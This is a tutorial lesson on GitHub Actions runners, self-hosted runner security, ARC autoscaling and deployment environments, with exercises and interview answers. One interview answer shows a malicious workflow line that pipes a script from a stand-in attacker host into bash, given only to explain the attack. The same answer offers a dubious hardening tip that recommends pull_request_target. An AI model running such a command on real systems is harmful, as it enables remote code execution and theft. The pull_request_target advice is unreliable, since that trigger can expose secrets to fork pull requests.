Basics Lesson 4 of 14

Runners & Environments

Where your workflows actually execute — GitHub-hosted runners, self-hosted runners, and deployment environments.

🧒 Simple Explanation (ELI5)

Back to our kitchen analogy from the previous lessons. You've written your recipe (the workflow YAML) and listed all the dishes (jobs) and cooking steps. But where do you actually cook?

Runners are the kitchens where your recipes run. There are two types:

GitHub-hosted runners = renting a professional kitchen. Every time you need to cook, GitHub gives you a brand-new, spotless kitchen with all the standard tools already installed — pots, pans, knives, an oven. You cook your meal, serve it, and walk out. The kitchen is cleaned and demolished. Next time, you get a completely new one. It costs per hour of use, but you never worry about maintenance, cleaning, or broken equipment.

Self-hosted runners = your own kitchen at home. It's always there. You can customize it however you want — install a pizza oven, stock your favorite spices, add a deep fryer. There's no rental cost. But you maintain it. If the stove breaks, you fix it. If it gets dirty, you clean it. And if someone sneaky walks in through the back door and messes with your food — that's your security problem.

Then there are deployment environments — these aren't kitchens, they're dining rooms. You have a casual dining room (staging) where you taste-test the food before the big dinner. And you have the formal dining room (production) where actual guests eat. Before serving food in the formal room, a head chef (reviewer) has to approve it. Environments add gates and rules to where your code goes after it's built.

🔧 Technical — GitHub-Hosted Runners

GitHub-hosted runners are virtual machines managed entirely by GitHub. They're created fresh for each job, execute your steps, and are destroyed afterward. Zero state carries over between runs.

Available Runner Images

| Label | OS | Architecture | Notes |
|---|---|---|---|
| `ubuntu-latest` | Ubuntu 22.04 LTS | x64 | Most popular. Will roll forward to 24.04 eventually. |
| `ubuntu-24.04` | Ubuntu 24.04 LTS | x64 | Pin to a specific version when `-latest` rollover is a risk. |
| `windows-latest` | Windows Server 2022 | x64 | Needed for .NET Framework, MSBuild, or Windows-specific tests. |
| `macos-latest` | macOS 14 (Sonoma) | ARM64 (M1) | Required for iOS/macOS builds with Xcode. |
| `macos-14` | macOS 14 (Sonoma) | ARM64 (M1) | Apple Silicon — faster than Intel-based macOS runners. |
| `macos-13` | macOS 13 (Ventura) | x64 (Intel) | Legacy Intel runner for older Xcode versions. |
💡 Pinning vs. Latest

Using ubuntu-latest is convenient but risky for reproducible builds. When GitHub rolls the label forward (e.g., from 22.04 to 24.04), your workflow may break due to different package versions or removed tools. For production pipelines, pin the version: runs-on: ubuntu-22.04. For quick CI checks, -latest is fine.
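A minimal sketch of pinning in practice (the job name and build command are illustrative, not from a real project):

```yaml
jobs:
  release-build:
    # Pinned image: unaffected when GitHub rolls the ubuntu-latest label forward
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v4
      - run: make release   # hypothetical build command
```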

Hardware Specifications

| Runner Type | CPU | RAM | Storage |
|---|---|---|---|
| Linux / Windows (standard) | 2-core x64 | 7 GB | 14 GB SSD |
| macOS (standard) | 3-core (M1 or Intel) | 7 GB (Intel) / 14 GB (M1) | 14 GB SSD |
| Linux larger runners | 4 / 8 / 16 / 32 / 64 cores | 16–256 GB | 150–2040 GB SSD |

Larger runners (4+ cores) are available on GitHub Team and Enterprise plans only. They're essential for heavy workloads like large Gradle builds, ML model training, or running dozens of parallel test containers.
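Larger runners are selected by the label your organization admin assigns when creating them. A sketch, assuming an admin created a larger runner with a name following the common `ubuntu-latest-8-cores` convention — the exact label depends on your org's setup:

```yaml
jobs:
  gradle-build:
    # Label must match whatever your org admin named the larger runner
    runs-on: ubuntu-latest-8-cores
    steps:
      - uses: actions/checkout@v4
      - run: ./gradlew build --parallel   # heavy build benefiting from extra cores
```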

Pre-Installed Software

GitHub-hosted runners come loaded with commonly used tools so you don't have to install them every run:

| Category | Tools |
|---|---|
| Languages | Node.js, Python, Java (multiple versions), Go, .NET, Ruby, PHP, Rust |
| Containers | Docker, Docker Compose, Podman (Linux), containerd |
| Cloud CLIs | Azure CLI, AWS CLI v2, Google Cloud SDK |
| Kubernetes | kubectl, Helm, Minikube, Kind |
| IaC | Terraform, Pulumi, Ansible |
| Build Tools | Maven, Gradle, CMake, Make, npm, yarn, pip |
| Utilities | git, curl, wget, jq, zip/unzip, OpenSSL |
💡 Full Software List

The complete list of installed software for each runner image is published in the actions/runner-images repository. Check the README for links to each image's software inventory. If a tool is missing, you can install it in a step before using it — but this adds time to every run.
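A sketch of installing a missing tool in a step before using it (the tool name and download URL are hypothetical placeholders):

```yaml
steps:
  # Hypothetical example: install a CLI the image doesn't ship.
  # This download runs on every job, so it adds time to each run.
  - name: Install extra tool
    run: |
      curl -fsSL -o /tmp/mytool.tar.gz https://example.com/mytool.tar.gz  # hypothetical URL
      sudo tar -xzf /tmp/mytool.tar.gz -C /usr/local/bin
  - run: mytool --version   # now available for later steps in this job
```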

Ephemeral Nature

This is the most important characteristic of GitHub-hosted runners: every job gets a brand-new VM. When the job finishes, the VM is destroyed. This means:

  - No files, caches, or environment variables survive from previous runs.
  - Every job must check out the repository and reinstall its dependencies.
  - Credentials or artifacts written to disk cannot leak into later jobs.
  - To offset the repeated setup cost, use caching (for dependencies) and artifacts (for passing build outputs between jobs).

Syntax

yaml
jobs:
  build:
    # Use a GitHub-hosted Ubuntu runner
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "Running on $(uname -a)"

  test-windows:
    # Use a GitHub-hosted Windows runner
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "Running on Windows"
        shell: pwsh  # PowerShell Core on Windows

🔧 Technical — Self-Hosted Runners

Self-hosted runners are machines you own and manage that connect to GitHub Actions to execute workflow jobs. They can be physical servers, VMs, cloud instances, or containers — anything that can run the GitHub Actions runner application.

Why Use Self-Hosted Runners?

  - Custom hardware — GPUs for ML training, high-memory machines, ARM-native builds.
  - Private network access — jobs that reach internal databases, on-prem APIs, or services behind a VPN.
  - Cost — no per-minute GitHub billing; cheaper at high CI volume.
  - Compliance — data residency requirements where code can't leave your infrastructure.
  - Pre-loaded tools — large Docker images, datasets, or SDKs installed once instead of on every run.

Setting Up a Self-Hosted Runner

Navigate to your repository (or organization) → Settings → Actions → Runners → New self-hosted runner. GitHub provides a script to download and configure the runner agent:

bash
# Download the runner package (Linux x64 example)
mkdir actions-runner && cd actions-runner
curl -o actions-runner-linux-x64-2.311.0.tar.gz -L \
  https://github.com/actions/runner/releases/download/v2.311.0/actions-runner-linux-x64-2.311.0.tar.gz
tar xzf ./actions-runner-linux-x64-2.311.0.tar.gz

# Configure the runner — connects it to your repository
./config.sh --url https://github.com/YOUR-ORG/YOUR-REPO \
            --token YOUR-REGISTRATION-TOKEN

# Start the runner as a service (persists across reboots)
sudo ./svc.sh install
sudo ./svc.sh start

Labels

Every self-hosted runner has labels that workflows use to select it. Default labels are assigned automatically based on the machine: self-hosted, linux (or windows, macOS), and x64 (or ARM64). You can add custom labels like gpu, high-memory, production, or team-backend.

yaml
jobs:
  train-model:
    # Runs on a self-hosted Linux machine with a GPU
    # ALL labels must match — this is an AND condition
    runs-on: [self-hosted, linux, gpu]
    steps:
      - uses: actions/checkout@v4
      - run: nvidia-smi  # Verify GPU is available
      - run: python train.py

  standard-ci:
    # Falls back to a regular self-hosted Linux runner
    runs-on: [self-hosted, linux]
    steps:
      - uses: actions/checkout@v4
      - run: npm test

Runner Groups

At the organization level, you can create runner groups to control which repositories can use which runners. For example, a restricted "production-deploy" group available only to repositories that deploy to production, and a "general-ci" group open to all private repositories in the organization.

Security Considerations

⚠️ Critical Security Warning

Never use self-hosted runners on public repositories. Anyone can fork a public repo, modify the workflow to run arbitrary code, open a PR, and that code executes on your machine. This means attackers can access your network, steal credentials, install malware, or pivot to other internal systems. Self-hosted runners are safe for private repositories where only trusted contributors can trigger workflows.
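Even on private repositories, a common hardening step is to keep fork-originated pull requests off self-hosted runners. A sketch, assuming a `pull_request`-triggered workflow (the job name and test script are illustrative):

```yaml
jobs:
  internal-tests:
    # Guard: skip when the PR head comes from a fork, so untrusted
    # code never executes on the self-hosted runner
    if: github.event.pull_request.head.repo.fork == false
    runs-on: [self-hosted, linux]
    steps:
      - uses: actions/checkout@v4
      - run: ./run-tests.sh   # hypothetical test script
```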

Autoscaling with Actions Runner Controller (ARC)

For teams running many workflows, manually managing self-hosted runners doesn't scale. Actions Runner Controller (ARC) runs on Kubernetes and automatically provisions runner pods based on workflow demand:

yaml
# Simplified ARC RunnerDeployment (Kubernetes CRD)
apiVersion: actions.summerwind.dev/v1alpha1
kind: RunnerDeployment
metadata:
  name: ci-runners
spec:
  replicas: 1  # Minimum runners
  template:
    spec:
      repository: my-org/my-repo
      labels:
        - self-hosted
        - linux
        - ci
---
apiVersion: actions.summerwind.dev/v1alpha1
kind: HorizontalRunnerAutoscaler
metadata:
  name: ci-runners-autoscaler
spec:
  scaleTargetRef:
    name: ci-runners
  minReplicas: 1
  maxReplicas: 10
  metrics:
    - type: TotalNumberOfQueuedAndInProgressWorkflowRuns
      repositoryNames:
        - my-org/my-repo

When workflows queue up, ARC spins up new runner pods (up to the max). When the queue empties, it scales back down. Each runner pod is ephemeral — destroyed after one job, matching GitHub-hosted behavior.

📊 GitHub-Hosted vs. Self-Hosted — Comparison

| Factor | GitHub-Hosted Runners | Self-Hosted Runners |
|---|---|---|
| Maintenance | Zero — GitHub manages everything (OS updates, tool upgrades, security patches) | Full responsibility — you handle OS updates, runner agent updates, tool installs |
| Cost | Free tier: 2,000 min/month (Free), 3,000 (Team). Then $0.008/min (Linux), $0.016/min (Windows), $0.08/min (macOS) | Infrastructure cost only — no per-minute GitHub billing. Cheaper at high volume. |
| Security | Ephemeral VMs with no cross-job contamination. Safe for public repos. | Persistent by default. Never use on public repos. Requires hardening. |
| Customization | Limited to pre-installed software + what you install each run. Standard hardware. | Full control — custom OS, GPU, high-memory, specialized libraries. |
| Network Access | Public internet only. Cannot reach private VPCs, on-prem databases, or internal APIs. | Full access to your internal network, VPN, private subnets. |
| Scalability | Virtually unlimited — GitHub manages the runner pool. | Limited by your infrastructure. Use ARC on Kubernetes for auto-scaling. |
| Startup Time | ~15–40 seconds to provision a fresh VM. | Near-instant if the runner is idle. Depends on pod scheduling with ARC. |
| State | Completely clean every run — no cache, no leftover files. | Persists unless configured as ephemeral. Can pre-cache dependencies. |
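Many teams combine both in one workflow: cheap stateless jobs on GitHub-hosted runners, network-bound jobs on self-hosted ones. A sketch (job names and npm scripts are illustrative):

```yaml
jobs:
  lint:
    # Cheap, stateless work: GitHub-hosted
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm run lint           # assumes a lint script exists

  integration:
    # Needs the private network: self-hosted inside the VPC
    runs-on: [self-hosted, linux]
    steps:
      - uses: actions/checkout@v4
      - run: npm run test:integration   # assumes this script exists
```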

🔧 Technical — Deployment Environments

Deployment environments are named targets that represent where your code gets deployed — development, staging, production. They're configured in your repository settings and referenced in workflow jobs to add protection rules, scoped secrets, and deployment tracking.

Creating Environments

Navigate to Settings → Environments → New environment. Give it a name (e.g., production). Then configure:

  - Protection rules — required reviewers, wait timers, and deployment branch restrictions
  - Environment-scoped secrets and variables, accessible only to jobs targeting this environment

Protection Rules

Protection rules are gates that must be satisfied before a job targeting the environment can run:

| Rule | What It Does | Use Case |
|---|---|---|
| Required reviewers | One or more people must approve the deployment in the Actions UI before the job starts. Up to 6 reviewers. | Production deployments — a senior engineer or lead reviews before go-live. |
| Wait timer | The job pauses for a specified number of minutes (0–43,200 = up to 30 days) before executing. | Soak time — deploy to staging, wait 30 minutes to monitor, then auto-promote. |
| Deployment branches | Only allow deployments from specific branches (e.g., only main can deploy to production). | Prevents accidental production deployments from feature branches. |
| Custom rules (beta) | GitHub Apps can implement custom protection logic (e.g., check monitoring dashboards, run smoke tests). | Automated promotion gates — only deploy if error rate is below threshold. |

Environment Secrets and Variables

Secrets and variables can be scoped to a specific environment. An environment secret named DB_PASSWORD in the production environment is only accessible to jobs that specify environment: production. This prevents staging jobs from accidentally using production credentials.

yaml
# Environment secrets override repository secrets with the same name.
# If both repo-level and environment-level DB_PASSWORD exist,
# the environment-level value wins for jobs targeting that environment.
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment: production  # This job can access production secrets
    steps:
      - run: echo "Connecting to ${{ secrets.DB_PASSWORD }}"
        # Uses the PRODUCTION DB_PASSWORD, not the repo-level one

Using environment: in a Workflow

The environment: key in a job definition links the job to a configured environment. You can also specify a url: that appears in the GitHub UI as a link to the deployed application:

yaml
name: Deploy Pipeline

on:
  push:
    branches: [main]

jobs:
  deploy-staging:
    runs-on: ubuntu-latest
    environment:
      name: staging
      url: https://staging.myapp.com
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh staging

  deploy-production:
    runs-on: ubuntu-latest
    needs: deploy-staging
    environment:
      name: production
      url: https://myapp.com
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh production

When deploy-production runs, it pauses and waits for a reviewer to approve (if required reviewers are configured). The reviewer sees a notification, can inspect the staging deployment, and then clicks Approve and deploy.

Deployment Activity

Every deployment to an environment is tracked in the Deployments section of your repository. You can see:

  - which commit was deployed, and when
  - who triggered the deployment and who approved it
  - the deployment status and a link to the environment's URL

📊 Runner & Environment Flow

Code Push → Runner Execution Flow

Code Push → GitHub Actions → Runner Pool → Runner Selection → GitHub-Hosted (ubuntu, windows, macos) or Self-Hosted (custom labels) → Execute Job

Environment Deployment Flow with Approval Gate

Build & Test → Deploy Staging (auto) → ⏸ Review & Approve → Deploy Production

Environment Secret Scoping

  - Repository Secrets: available to all jobs
  - Staging Env Secrets: only jobs with environment: staging
  - Production Env Secrets: only jobs with environment: production

⌨️ Hands-on Exercises

Exercise 1: Compare Ubuntu vs. Windows Runners

Create a workflow that runs the same job on both ubuntu-latest and windows-latest to observe the environment differences:

yaml
name: Runner Comparison

on:
  workflow_dispatch:  # Manual trigger

jobs:
  compare:
    strategy:
      matrix:
        os: [ubuntu-latest, windows-latest]
    runs-on: ${{ matrix.os }}
    steps:
      - name: OS Information
        run: |
          echo "Runner OS: ${{ runner.os }}"
          echo "Runner Arch: ${{ runner.arch }}"
          echo "Runner Name: ${{ runner.name }}"
          echo "Runner Temp: ${{ runner.temp }}"
          echo "Runner Tool Cache: ${{ runner.tool_cache }}"

      - name: List pre-installed tools
        run: |
          echo "--- Node.js ---"
          node --version
          echo "--- Python ---"
          python3 --version || python --version
          echo "--- Docker ---"
          docker --version || echo "Docker not available"
          echo "--- kubectl ---"
          kubectl version --client || echo "kubectl not available"
          echo "--- Helm ---"
          helm version || echo "Helm not available"
        shell: bash

What to verify: Trigger manually from Actions tab. You'll see two jobs — one on Ubuntu, one on Windows. Compare the installed tool versions, the working directory paths (/home/runner vs. C:\), and which tools are available on each OS.

Exercise 2: Add an Environment with Protection Rules

Set up a deployment environment with a manual approval gate:

  1. Go to repository Settings → Environments → New environment
  2. Name it production
  3. Under Environment protection rules, enable Required reviewers and add yourself
  4. Optionally add a Wait timer of 5 minutes
  5. Under Deployment branches, select Selected branches and add main

Then create this workflow:

yaml
name: Deploy with Approval

on:
  push:
    branches: [main]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "Building application..."
      - run: echo "Running tests..."

  deploy:
    runs-on: ubuntu-latest
    needs: build
    environment:
      name: production
      url: https://myapp.example.com
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        run: |
          echo "🚀 Deploying to production!"
          echo "Deployed ref: ${{ github.ref_name }}"
          echo "Approved by a reviewer before reaching this point."

What to verify: Push to main. The build job completes immediately. The deploy job shows "Waiting for review" — click into it, approve it, and watch it run.

Exercise 3: Explore the runner Context

The runner context provides information about the machine executing the current job:

yaml
name: Runner Context Explorer

on: workflow_dispatch

jobs:
  explore:
    runs-on: ubuntu-latest
    steps:
      - name: Dump runner context
        run: |
          echo "runner.os = ${{ runner.os }}"          # Linux, Windows, or macOS
          echo "runner.arch = ${{ runner.arch }}"       # X64, ARM64
          echo "runner.name = ${{ runner.name }}"       # Runner machine name
          echo "runner.temp = ${{ runner.temp }}"       # Path to temp directory
          echo "runner.tool_cache = ${{ runner.tool_cache }}"  # Path to tool cache

      - name: Check disk space
        run: df -h

      - name: Check memory
        run: free -m

      - name: Check CPU
        run: lscpu | head -20

What to verify: Confirm the 2-core CPU, ~7 GB RAM, and ~14 GB disk. These match the documented specs for standard GitHub-hosted Linux runners.

🐛 Debugging Common Issues

Scenario: "No runner matching the specified labels was found"

The job sits in "Queued" and eventually fails with this error. GitHub cannot find a runner that matches your runs-on labels. Check that every label in runs-on is spelled correctly and exists on at least one registered runner (labels are AND-matched), that the runner shows as Online under Settings → Actions → Runners, and that its runner group grants this repository access.

Scenario: "Job queued but never starts"

The job shows "Queued" for an unusually long time without starting — minutes or even hours. Common causes: all matching runners are busy (the job waits for one to free up), you've hit your plan's concurrent-job limit, a self-hosted runner has gone offline, or there's a GitHub Actions service incident (check githubstatus.com).

Scenario: "Environment protection rule — waiting for review"

The deployment job is paused, showing a yellow "Waiting" badge and a "Review deployments" button. This is expected behavior, not an error: the job targets an environment with required reviewers. A configured reviewer must open the run and click Review deployments → Approve and deploy before the job proceeds.

💡 Runner Diagnostic Logs

For self-hosted runner issues, check the runner's diagnostic logs at _diag/Runner_*.log and _diag/Worker_*.log in the runner installation directory. These contain detailed connection, registration, and job execution logs. For GitHub-hosted runner issues, set the ACTIONS_STEP_DEBUG repository secret to true to get verbose step-level output.

🎯 Interview Questions

Beginner

Q: What is the difference between a GitHub-hosted runner and a self-hosted runner?

A GitHub-hosted runner is a virtual machine managed entirely by GitHub. It's provisioned fresh for every job, comes pre-loaded with common tools (Docker, Node.js, kubectl, etc.), and is destroyed after the job completes. You don't manage it — GitHub handles OS updates, security patches, and scaling. A self-hosted runner is a machine you own and maintain — a physical server, VM, or cloud instance running the GitHub Actions runner agent. You're responsible for OS updates, tool installation, security hardening, and capacity management. Self-hosted runners give you custom hardware (GPUs, high memory), access to private networks, and cost savings at scale, but require significantly more operational effort.

Q: What does runs-on: ubuntu-latest mean and what does the runner provide?

runs-on: ubuntu-latest tells GitHub Actions to execute the job on a GitHub-hosted Ubuntu VM using the latest stable LTS image (currently Ubuntu 22.04, will roll forward to 24.04). The runner provides a 2-core x64 CPU, 7 GB RAM, 14 GB SSD, and hundreds of pre-installed tools including Docker, Node.js, Python, Java, Go, .NET, kubectl, Helm, Azure CLI, AWS CLI, Terraform, git, and more. The VM is ephemeral — created fresh for this job and destroyed afterward. No state persists between runs. The -latest tag means GitHub controls when the version advances, which can cause breakages; pin to ubuntu-22.04 for production pipelines.

Q: What is a deployment environment in GitHub Actions?

A deployment environment is a named target configured in repository settings that represents a deployment destination — such as development, staging, or production. Environments provide three key features: (1) Protection rules — required reviewers who must approve before the deployment runs, wait timers that add a delay, and branch restrictions that limit which branches can deploy. (2) Scoped secrets and variables — secrets like DB_PASSWORD that are only accessible to jobs targeting that specific environment, preventing staging jobs from using production credentials. (3) Deployment tracking — GitHub logs every deployment with the commit SHA, timestamp, triggering user, and a link to the live URL. You reference environments in workflows with the environment: key in a job definition.

Q: Why are GitHub-hosted runners called "ephemeral"?

GitHub-hosted runners are called ephemeral because they are created from scratch for each job and destroyed immediately after. Every job gets a brand-new, clean VM — no files, caches, environment variables, or installed packages from any previous run exist. This provides strong security guarantees (no cross-job contamination) and consistency (identical starting state every time). The downside is that you must re-clone your repository, re-install dependencies, and re-build from scratch every run. To mitigate the performance cost, GitHub provides caching (for dependencies like node_modules) and artifacts (for passing build outputs between jobs).

Q: What is the runner context and what information does it provide?

The runner context is an object available in GitHub Actions expressions that contains information about the runner executing the current job. Key properties: runner.os returns the operating system (Linux, Windows, or macOS), runner.arch returns the CPU architecture (X64 or ARM64), runner.name returns the runner's machine name, runner.temp returns the path to a temporary directory cleared after each job, and runner.tool_cache returns the path to the tool cache directory. It's useful for writing cross-platform workflows: if: runner.os == 'Windows' lets you conditionally use PowerShell syntax on Windows and bash on Linux.
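The cross-platform conditional mentioned above can be sketched as a pair of guarded steps (step names are illustrative; RUNNER_OS is a default environment variable set by Actions):

```yaml
steps:
  - name: Windows-only setup
    if: runner.os == 'Windows'
    run: Write-Host "Using PowerShell on $env:RUNNER_OS"
    shell: pwsh

  - name: Linux/macOS setup
    if: runner.os != 'Windows'
    run: echo "Using bash on $RUNNER_OS"
    shell: bash
```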

Intermediate

Q: When would you choose self-hosted runners over GitHub-hosted, and what are the trade-offs?

Choose self-hosted runners when you need: (1) Custom hardware — GPUs for ML training, ARM CPUs for ARM-native builds, high-memory machines for large compilations. (2) Private network access — jobs that connect to internal databases, on-prem APIs, or services behind a VPN/firewall. (3) Cost optimization — if you're running hundreds of CI minutes daily, dedicated machines can be cheaper (~$0.008/min for GitHub-hosted Linux adds up). (4) Compliance — data residency requirements where code can't leave your infrastructure. (5) Pre-loaded tools — large Docker images, datasets, or SDKs pre-installed to avoid download time. Trade-offs: you're responsible for maintenance (OS patches, runner updates), security hardening (never use on public repos), capacity planning, and uptime. GitHub-hosted runners are zero-maintenance and safe by default, but limited to standard hardware and public internet.

Q: How does Actions Runner Controller (ARC) work for autoscaling self-hosted runners?

ARC is a Kubernetes operator that manages GitHub Actions self-hosted runners as pods. You deploy ARC to your Kubernetes cluster and define RunnerDeployment resources specifying the repository, labels, and base image. A HorizontalRunnerAutoscaler monitors the GitHub Actions job queue and scales the runner pods up or down based on demand. When workflows queue up, ARC creates new runner pods (up to maxReplicas). When the queue empties, it scales down to minReplicas. Each runner pod is ephemeral — it processes one job and is destroyed, matching GitHub-hosted behavior. ARC supports webhook-based scaling (fastest — reacts to GitHub webhook events in seconds) and polling-based scaling (checks the API periodically). It integrates with Kubernetes features like node selectors, tolerations, and resource requests for GPU scheduling.

Q: What is the difference between environment secrets and repository secrets?

Repository secrets are available to all workflow jobs in the repository, regardless of which environment they target. They're set in Settings → Secrets and variables → Actions. Environment secrets are scoped to a specific deployment environment — they're only accessible to jobs that include environment: <name> in their definition. If both a repository secret and an environment secret have the same name, the environment secret takes precedence for jobs targeting that environment. Use case: you might have a DB_PASSWORD repository secret for development and separate DB_PASSWORD environment secrets for staging and production, each with different values. This prevents staging jobs from accidentally using production credentials. Environment secrets also benefit from environment protection rules — a reviewer must approve before the job can access the secrets.

Q: How do deployment branch restrictions work with environments?

Deployment branch restrictions let you control which branches can trigger deployments to a specific environment. In Settings → Environments → [name] → Deployment branches, you can choose: All branches (any branch can deploy), Protected branches (only branches with branch protection rules), or Selected branches (you specify exact branch names or patterns like release/*). If a workflow job targets the environment from a non-allowed branch, the job fails immediately with a permissions error. This prevents accidental production deployments from feature branches — even if someone modifies the workflow YAML to target production, the protection rule blocks it. Combined with required reviewers, this creates a multi-layer security gate: only approved branches, only after human approval.

Q: Explain the environment: key syntax — what's the difference between a string and an object?

The environment: key supports two forms. String form: environment: production — just the environment name. The job links to the environment for protection rules and secret scoping, but no URL is tracked. Object form: environment:\n name: production\n url: https://myapp.com — includes both the name and a deployment URL. The URL appears in the GitHub UI as a clickable link in the deployment activity log and as a "View deployment" button on the workflow run page. The URL can use expressions: url: https://${{ steps.deploy.outputs.hostname }} to dynamically set it from a deployment step's output. Using the object form is recommended for web applications — it gives reviewers and developers one-click access to verify the live deployment.
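A sketch of the dynamic-URL pattern described above, assuming a hypothetical deploy step that writes the deployed hostname to its step outputs:

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment:
      name: production
      # Filled in from the deploy step's output below
      url: ${{ steps.deploy.outputs.hostname }}
    steps:
      - uses: actions/checkout@v4
      - id: deploy
        # Hypothetical deploy script; here we just emit the hostname
        run: echo "hostname=https://myapp.example.com" >> "$GITHUB_OUTPUT"
```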

Scenario-Based

Q: Your company has both ML workloads (requiring GPUs) and standard web application CI. Design a runner strategy that handles both efficiently.

Use a hybrid setup: (1) Web CI: GitHub-hosted runners (runs-on: ubuntu-latest). Zero maintenance, automatic scaling, and the web team doesn't need to manage infrastructure. Standard 2-core runners handle linting, testing, and Docker builds efficiently. (2) ML workloads: Self-hosted runners on GPU-equipped machines (cloud GPU instances or on-prem hardware), labeled [self-hosted, linux, gpu]. Deploy ARC on Kubernetes with GPU node pools for autoscaling — min 1 pod (always warm), max 5 pods (for batch training). Use --ephemeral flag to prevent state leakage between ML experiments. (3) Organization: Create two runner groups: "general-ci" (GitHub-hosted, all repos) and "ml-runners" (self-hosted GPU, restricted to ML repos only). (4) Cost: Web CI uses GitHub's free tier (2,000 min/month). GPU instances only run when jobs are queued (ARC autoscaling), minimizing cloud spend. Total: zero runner maintenance for 80% of jobs, dedicated hardware for the 20% that need it.

Q: Design an environment promotion strategy for a microservices application with development, staging, and production environments. Include approval gates and secret management.

Create three GitHub environments with escalating protection: (1) development — no protection rules, auto-deploys on every push to develop branch. Environment secrets: dev database URL, dev API keys. (2) staging — deployment branch restriction to main only, 10-minute wait timer (soak time for automated smoke tests). Environment secrets: staging database URL, staging API keys. (3) production — requires 2 reviewers (tech lead + product owner), deployment branch restriction to main, 30-minute wait timer after approval. Environment secrets: production database URL with read/write access, production API keys. Workflow structure: One workflow triggered on push to main with three sequential jobs: deploy-dev (auto) → deploy-staging (auto, 10-min soak) → deploy-production (2 reviewers + 30-min timer). Each job uses its environment's scoped secrets. The wait timer on staging gives the team time to run manual exploratory tests before production promotion. Secret isolation: Each environment's DB_PASSWORD is different — a staging job can never access the production database.

Q: A teammate's workflow keeps failing with "No runner matching labels." The workflow uses runs-on: [self-hosted, linux, arm64]. How do you troubleshoot?

Systematic troubleshooting: (1) Check registered runners: Settings → Actions → Runners. Verify a runner exists with ALL three labels: self-hosted, linux, and arm64. Labels are AND-matched — missing any one label means no match. (2) Check runner status: Is it showing as "Online" (green dot) or "Offline" (red)? If offline, SSH into the machine and check: sudo ./svc.sh status. Restart: sudo ./svc.sh start. Check _diag/Runner_*.log for errors. (3) Check runner group: If it's an org-level runner, verify the runner group includes this repository in its access list. (4) Check label case: Labels are case-insensitive, but ensure no invisible characters or trailing spaces. (5) Check busy status: If the runner is executing another job and no other matching runners exist, the job queues until the runner is free. Solution: add more runners or use ARC. (6) Check ephemeral: If the runner was configured with --ephemeral, it deregisters after one job. A new instance must start before the next job can be picked up.

Q: Your self-hosted runner was compromised after being used on a public repository. How did this happen and how do you prevent it?

How it happened: An attacker forked the public repository, modified the workflow YAML in their fork to execute malicious commands (e.g., run: curl http://attacker.com/exfil | bash), and opened a pull request. GitHub Actions triggered the workflow on the pull_request event, and the malicious code ran on the self-hosted runner with full access to the machine's filesystem, network, and any cached credentials. Prevention: (1) Never use self-hosted runners on public repos — this is the fundamental rule. Use GitHub-hosted runners for public repos. (2) For private repos: Use ephemeral runners (--ephemeral flag) so no state persists. Run the runner agent inside a container with limited privileges. (3) Restrict fork PR triggers: Set on: pull_request_target instead of pull_request and require approval for first-time contributors. (4) Runner groups: Restrict sensitive runners to specific repos via runner groups. (5) Harden the machine: Minimal OS, no unnecessary services, network segmentation, and regular rotation of credentials.

Q: A fintech company needs CI/CD that meets SOC 2 compliance. How would you design the runner and environment strategy?

Runners: Self-hosted runners inside the company's VPC on hardened, CIS-benchmarked VMs. This ensures code and build artifacts never leave the controlled network (data residency). Use ARC on an internal Kubernetes cluster for autoscaling. All runner VMs run container-based ephemeral jobs — no state persistence. Runner images are built from an approved base, scanned for vulnerabilities, and rotated weekly. Environments: Three environments with escalating controls. staging — auto-deploy from main, environment secrets for staging DB, audit log enabled. production — requires two reviewers (engineering lead + security officer), deployment branch restricted to main, 1-hour wait timer (soak period), environment secrets for production systems with separate least-privilege credentials. Audit trail: All deployments logged in GitHub's deployment history (who approved, when, which commit). Integrate with SIEM for monitoring. Secrets: No hardcoded credentials — use environment secrets + external vault integration (HashiCorp Vault or Azure Key Vault). Rotate all secrets quarterly. Open-source projects: Use GitHub-hosted runners only — complete isolation from corporate infrastructure.

🌍 Real-World Use Case

A fintech company with 50+ engineers needed a CI/CD strategy that balanced speed, cost, compliance, and security across multiple project types.

The Challenge

The company had three categories of projects: (1) open-source client libraries published on npm/PyPI, (2) internal microservices handling payment processing, and (3) a data science team training fraud detection models. Each had different requirements:

  - The open-source libraries receive PRs from untrusted contributors, so workflows must be safe to run against arbitrary forked code.
  - The payment microservices need access to databases inside the private VPC and must meet compliance requirements.
  - The fraud-model training jobs need dedicated GPU hardware that standard GitHub-hosted runners don't provide.

The Solution

| Project Type | Runner Strategy | Environment Strategy |
|---|---|---|
| Open-source libraries | GitHub-hosted runners only (ubuntu-latest). Safe for untrusted PR code. No access to internal resources. | Single release environment with required reviewer (maintainer must approve npm publish). |
| Internal microservices | Self-hosted runners inside VPC for integration tests. Ephemeral, container-based via ARC. GitHub-hosted for linting/unit tests. | Three environments: dev (auto-deploy), staging (auto + 15-min soak), production (2 reviewers + branch restriction to main). |
| ML pipelines | Self-hosted runners on GPU instances (NVIDIA A100) in a dedicated Kubernetes GPU node pool. ARC manages scaling 1–4 pods based on job queue. | training environment (auto, tracks experiment metadata). model-production environment (data scientist + ML engineer approval required). |

The Results

📝 Summary

  - GitHub-hosted runners are ephemeral, zero-maintenance VMs billed per minute; pin image versions (e.g., ubuntu-22.04) for reproducible production pipelines.
  - Self-hosted runners run on your own hardware, selected via labels; they offer custom hardware and private-network access, but require maintenance and must never be used on public repositories. Scale them with ARC on Kubernetes.
  - Deployment environments are named targets with protection rules (required reviewers, wait timers, branch restrictions), scoped secrets, and deployment tracking, referenced via the environment: key in a job.
